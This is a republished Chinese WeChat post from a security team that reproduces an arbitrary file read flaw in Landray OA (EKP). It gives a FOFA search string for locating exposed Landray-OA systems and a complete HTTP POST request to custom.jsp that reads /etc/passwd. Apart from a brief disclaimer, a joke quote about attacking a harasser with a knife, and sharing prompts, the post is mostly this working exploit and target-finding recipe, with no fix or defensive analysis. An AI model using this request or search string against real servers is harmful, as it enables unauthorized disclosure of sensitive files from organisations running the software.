“ 带女朋友去吃饭遇到流氓向女朋友吹口哨该怎么办。你若是年轻就应该提刀砍他,若是过了那个年纪,就应该努力挣钱,带她去高档点的餐厅吃饭,那里没有流氓。”
导读
本文章仅用于交流学习,请勿使用该方法进行违法活动,谢谢!
漏洞描述
深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息。
漏洞影响
蓝凌OA漏洞复现
1)FOFA
app="Landray-OA系统"
2)登录界面
3)出现漏洞的文件为custom.jsp
构造请求包如下
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host:xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 42Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipvar={"body":{"file":"file:///etc/passwd"}}
- - - - - - - - - - - - - - - END - - - - - - - - - - ----------
点关注,不迷路
觉得不错的帮忙点个“赞”,“在看” ~~~
原文始发于微信公众号(五六七安全团队):蓝凌OA custom.jsp 任意文件读取
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论